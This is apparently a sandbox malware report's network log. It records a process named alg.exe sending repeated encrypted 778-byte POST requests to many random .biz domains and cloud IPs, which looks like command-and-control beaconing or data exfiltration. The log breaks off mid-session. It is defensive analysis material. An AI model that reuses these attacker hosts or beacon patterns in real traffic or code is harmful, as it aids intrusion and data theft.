Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 798
Oct 28, 2024 16:37:07.929807901 CET | 798 | OUT | Data Raw: 81 de e9 17 8f 52 f6 f1 12 03 00 00 7a 6c a0 a9 49 ad 1a 1e c0 e6 d5 6b 58 37 53 f2 51 6b 10 a7 4d 98 30 e7 c3 df 73 f6 05 b0 fd 9d 96 6e 98 60 26 be 9f a3 92 28 cb f4 6a ec 63 59 e6 c5 cc 1b 16 3d d7 eb 65 88 a6 b0 5b 72 ad d5 d4 4d 56 ba 51 2c
Data Ascii: RzlIkX7SQkM0sn`&(jcY=e[rMVQ,nAO+up(-5scwf5:k>i@]D(I~I$P8Ia~.uS<3r\9h~ ?LfK5;/M*UQHb/S/1~HZLV
Oct 28, 2024 16:37:08.618495941 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:37:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1187972bfb1ec9cba29b2ee145ed4e96|155.94.241.188|1730129828|1730129828|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49736 | 54.244.188.177 | 80 | 6732 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:08.031359911 CET | 344 | OUT | POST /ils HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:37:08.031398058 CET | 778 | OUT | Data Raw: 9d eb 8f ec 2a dc 36 c6 fe 02 00 00 aa 7a 17 96 22 4e 16 3a 01 08 a6 80 37 92 e0 7d 6e 93 f0 94 b1 05 da 42 45 91 af b1 4b 1b dc 18 28 6c da 7e 64 2b d4 66 ec 7a 54 0b 9d a7 8c 6d 11 e1 83 63 f7 34 12 50 10 81 1d 33 64 a3 35 f4 98 9d 2a a6 5c 8e
Data Ascii: *6z"N:7}nBEK(l~d+fzTmc4P3d5*\M'5Bs-AQ%LH9#w\`ly[=gAeP,(ia-ccYZLs"6e1asvm;(uoHfDt3[/3Ei,{iB
Oct 28, 2024 16:37:08.865279913 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:37:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=38387cc5197bb037118ceb86a3854c8a|155.94.241.188|1730129828|1730129828|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49737 | 44.221.84.105 | 80 | 6732 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:08.937984943 CET | 356 | OUT | POST /beqepswmsyxa HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:37:08.938003063 CET | 778 | OUT | Data Raw: 2c 33 fa 7f 16 cd 5f f7 fe 02 00 00 e8 d3 45 10 a0 31 67 c7 01 96 bf bd e3 d5 c9 a3 19 72 42 dc 6f 21 66 a4 68 e3 06 99 01 1f 11 c2 5e 08 c4 12 a0 40 b3 10 b7 3c 02 c4 b7 65 13 df 4c 3a dc e9 41 0e a6 80 ab da db f1 8c df 47 5d b7 6a 02 fc 1c 37
Data Ascii: ,3_E1grBo!fh^@<eL:AG]j7&5R;d_{]U(c2q]<v97jP'Ot$[WSR=)TwjZ=dmuuw9!cRF%<;vN$Ql{yVZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49738 | 44.221.84.105 | 80 | 6732 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:09.375129938 CET | 355 | OUT | POST /rdbyhsstwxr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:37:09.375129938 CET | 778 | OUT | Data Raw: 0a 78 0a 32 d3 95 8d 5f fe 02 00 00 47 23 85 4e ee 31 f6 22 9e 66 54 6d 5a 58 9f 68 cc 91 c8 be 8c 52 4e 8d fb a6 5d 29 ce 1c 5d aa 1c 12 ec 9e 29 3d e4 e2 e4 d2 c8 16 6f b2 6f 16 4f 04 ec 5d c5 6b a3 f1 aa a3 71 a7 ff 4e 91 8d 31 02 72 dd 9f 16
Data Ascii: x2_G#N1"fTmZXhRN])])=ooO]kqN1r9~L|L-#.O&&Ax }]hO SVX^b\K8o2x}@l]@p"s92|r{NuV-c<FcrxZ(UU|5m|
Oct 28, 2024 16:37:10.040299892 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:37:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ef3614c938c2e6e944876d710e030ba7|155.94.241.188|1730129829|1730129829|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49739 | 172.234.222.143 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:10.144428015 CET | 347 | OUT | POST /dbhv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:37:10.144540071 CET | 778 | OUT | Data Raw: 1b 1f 5b 03 67 d2 b8 c4 fe 02 00 00 53 d3 9e 9b 81 29 e2 c2 26 60 1f 95 47 11 66 4c 1c 42 21 cd 53 bd 45 a2 ba 87 f3 15 f5 d2 11 80 47 1c e7 e2 ac 45 d5 31 3d d2 e8 68 78 f3 3b 15 49 a3 34 31 35 2d da ac 32 ff 21 12 f7 35 dd b8 95 30 4e 97 d0 fe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49740 | 172.234.222.143 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:10.840492010 CET | 355 | OUT | POST /uyurjsjwfnxw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:37:10.840492010 CET | 778 | OUT | Data Raw: 5b ab a0 00 56 61 c5 fc fe 02 00 00 c2 3f 03 59 28 4a 6d ca d1 b9 6c a2 37 25 ab db b3 97 d4 10 b3 31 dd 2b 0b 7a 31 9b 38 0a 1c dd 55 ea bc f3 b7 9c e0 9a 93 3c ec 2c c4 bc 27 a0 c2 9a 8e 58 2b 4b 49 00 7d 00 71 b0 16 a3 55 81 b5 ce 79 e2 30 7a


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49741 | 18.141.10.107 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:11.635205984 CET | 353 | OUT | POST /qmxhsynps HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:37:11.635219097 CET | 778 | OUT | Data Raw: d1 e3 2e bc f2 20 d6 e8 fe 02 00 00 6a 5e f7 dc 2a 38 ab 07 53 c1 da 5b 81 26 94 28 ac 11 13 8c d6 a2 29 06 a9 58 ae 16 d4 45 5f 0d 12 30 bc 2e 97 40 73 e4 f0 c4 97 ca 7e df f7 1c 38 d6 fe 52 99 6f 12 01 fb e8 85 85 7e 0f be c7 69 a0 10 26 d4 4c
Oct 28, 2024 16:37:13.057900906 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=7420263dec49470afd28cdab1e6598d2|155.94.241.188|1730129832|1730129832|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49742 | 82.112.184.197 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:13.318017960 CET | 358 | OUT | POST /saedqhwkiyelcofi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:37:13.318042040 CET | 778 | OUT | Data Raw: ed 03 02 f4 41 1e a8 54 fe 02 00 00 3e 70 51 26 9f 97 3f bc 82 72 fa 9c 18 da fe 9d a8 19 e0 3a bf 42 d7 ac 7b 62 52 5d 66 24 0a c5 48 16 19 fc 86 50 2f a6 02 bb 12 bb cc eb 11 1c f2 de 51 dd b0 73 7d 1a c8 61 85 51 fe e8 8d 5f 99 84 7c 0f 1d 9e


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49747 | 82.112.184.197 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:21.884516001 CET | 348 | OUT | POST /wxhqgp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:21.884533882 CET778OUTData Raw: 25 d2 ce 00 6b d4 8e b4 fe 02 00 00 2f fd ce d3 11 5e 6c 8b a1 fa 15 ad 03 0e ce 83 7e 64 9a 49 ac d6 d4 a6 c5 94 5f bc 66 12 62 fa 55 f2 40 7e f4 01 52 85 8a 4c 48 d4 a4 0e c4 20 6e 07 ae 11 ce 71 5e 1a c4 a4 9f b2 21 43 61 21 6d 99 12 6a ea 1c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: %k/^l~dI_fbU@~RLH nq^!Ca!mjwHoe93{5k5,y~-nWcT$;p~r'm}7Sa['?C"a~njzc6cK|s%tgZF-9s{


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49750 | 82.112.184.197 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:25.482213974 CET | 361 | OUT | POST /lxjfxiwwkxywcqoq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:37:25.482342958 CET | 778 | OUT | Data Raw: 49 c6 63 3d cf 29 94 dd fe 02 00 00 3f 0b f4 16 c8 8b fb 1e 11 4e af 4c 60 89 37 fc 2f db 64 50 db 8b 03 01 68 82 6d 94 56 e6 2f ae 74 88 51 b6 3e 18 e0 7c 54 e8 61 4d 12 c0 24 67 ce 40 72 b5 de 62 e3 3f aa 07 1c a7 1a 62 f1 06 0a 72 c5 58 d2 42
Data Ascii: Ic=)?NL`7/dPhmV/tQ>|TaM$g@rb?brXBY^W94z%mj2S5a^CR7Bw:,bLV`\ASFuMc/5\2=*5(.:_p`<).} lA~


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49751 | 82.112.184.197 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:29.403403997 CET | 355 | OUT | POST /uswmbyvknw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:37:29.403445959 CET | 778 | OUT | Data Raw: 99 23 a9 99 76 48 45 e2 fe 02 00 00 06 60 eb c8 ba 75 3c 19 5a 80 69 e8 e0 de bf 75 30 bf 57 8d 7d e3 4e 9b 83 af b6 a1 2c 47 5a 3b e0 8e 52 be 1d f5 b9 5d 4f 15 be b6 e2 f3 70 bf 32 7f eb 74 13 87 0c c5 ba d7 cb 14 7b 8c ce 62 c8 5c 30 84 c8 95
Data Ascii: #vHE`u<Ziu0W}N,GZ;R]Op2t{b\0F!6^XzJET9$K3])~P-sxdW'qs"\)3o\v(+wHr8c^gr>fC)K#D{mo<b\


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49752 | 47.129.31.212 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:33.742664099 CET | 346 | OUT | POST /shm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:37:33.742685080 CET | 778 | OUT | Data Raw: 96 fb 44 b2 7a 19 c6 d4 fe 02 00 00 24 74 d3 29 d4 d0 b1 ba 74 51 e7 13 61 78 3e 60 8a 10 63 65 ca 75 47 09 28 10 49 d1 1f b0 91 4f e1 0a c9 7d 55 f9 d1 df 8b 73 23 8a e2 e6 d9 67 0d 9a 48 b6 1c 2d cd 22 a1 8e c6 53 9a d7 c5 d1 78 9b ad a3 f1 08
Data Ascii: Dz$t)tQax>`ceuG(IO}Us#gH-"Sx];i4)q-qP~y^&r[)\VAqd<M`qD@lsre-j~=FiJ4
Oct 28, 2024 16:37:35.204986095 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:37:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a1a78966b72a12eb840a028cd377de3e|155.94.241.188|1730129854|1730129854|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49753 | 13.251.16.150 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:35.395889997 CET | 354 | OUT | POST /nxomllvrieoy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:37:35.395915985 CET | 778 | OUT | Data Raw: 85 f1 65 4c 83 0d 12 8a fe 02 00 00 68 c6 fa e8 6b 5f 9e 23 bf 7e 98 08 5a b8 9a e2 40 98 2e 2a a9 b7 e6 b7 22 d9 f4 ce 39 e1 c4 0e 9f 5b de d4 57 fe c1 7c 80 65 22 8f 2d e8 45 65 7a 0c 42 87 bc 1c 9c ae b0 0d 38 9d b9 77 10 01 4c 5d af 25 f4 63
Data Ascii: eLhk_#~Z@.*"9[W|e"-EezB8wL]%cFK-qu!/^CwNH<Rl,s5gs_p uei 8M4?>l16YM>K;)?gz#Nnxk=xbE<nkBF(!a#o$<M
Oct 28, 2024 16:37:36.850178957 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:37:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=99b73fd695da937a58f19adcbad7df1b|155.94.241.188|1730129856|1730129856|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49754 | 44.221.84.105 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:36.984323025 CET | 361 | OUT | POST /ywkdmkysrijolmoj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:37:36.984335899 CET | 778 | OUT | Data Raw: 22 fc 5b e5 00 78 e9 78 fe 02 00 00 19 ed d3 24 49 5a 4b 47 0a 28 cd 80 81 a1 2c 8a 8a 72 a0 24 9c da cc c4 d4 8b f8 f4 87 c5 55 a0 8b 7f c2 7c 3a ee 7c 0f b6 1b ad 60 9c 77 6a e6 e8 9b 98 f0 f3 6d ea e3 5b 1c d1 86 06 2b 19 dc 59 17 52 f5 06 09
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: "[xx$IZKG(,r$U|:|`wjm[+YR&g?BWwKI2/4gc:HR\5$E~/QX@*>`"?<}VfIZG#@c{,0Y-8v~3Y]ba:L`IH>&JbtqKKJ/,^QM
Oct 28, 2024 16:37:37.641170979 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=58d979b6b712841c85d02cf937b44ee4|155.94.241.188|1730129857|1730129857|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49755 | 18.141.10.107 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:37.816354036 CET | 345 | OUT | POST /ws HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:37:37.816354036 CET | 778 | OUT | Data Raw: 46 2f bc 6c c9 1b d8 b4 fe 02 00 00 26 1c 38 5f 13 70 e8 b6 e2 09 0e 15 9b ce 45 c2 21 2a 81 92 88 2e 94 6d f3 4b 66 23 b9 4a 81 3f d3 c3 13 e8 6c e1 55 63 b9 7c 80 3c 6e eb ea 96 6c 11 6c 59 56 06 c5 51 01 47 c8 80 8a 4e d7 a8 73 86 5a 1d b3 53
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: F/l&8_pE!*.mKf#J?lUc|<nllYVQGNsZSX=}/zbu\4GZNF^V)q^=)A]$"F9Wlv2Dv4!s~4gJ.5Pbp)p7-t\CxU~>yAXj(cC8AGB-dyLJf
Oct 28, 2024 16:37:39.262722969 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=e85432322b7b03166925383059fd9be5|155.94.241.188|1730129858|1730129858|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49756 | 172.234.222.138 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:39.448924065 CET | 350 | OUT | POST /yhrktnvbm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:37:39.448924065 CET | 778 | OUT | Data Raw: 80 8d 3a e4 41 c9 45 c4 fe 02 00 00 6e 21 b9 f0 ba 91 34 80 9b 6b dd d5 59 fd ca ad 28 96 cb b5 7a c9 b1 37 7a 5c f2 a6 e3 0b 61 08 67 b9 06 e9 98 ef 88 d1 1f fd 26 8f bb c7 9c cf 02 fa 42 7d 54 3a 76 fc bf 0f bd c8 bd 0e b7 65 cd b1 84 40 54 0d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: :AEn!4kY(z7z\ag&B}T:ve@T(claD=lnyI(r}Z} k8p >MN`SR,VJbVc`@o\86I{qsr|e4T"/xbGoFWA,


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49757 | 172.234.222.138 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:40.150809050 CET | 350 | OUT | POST /mjmfrcmno HTTP/1.1
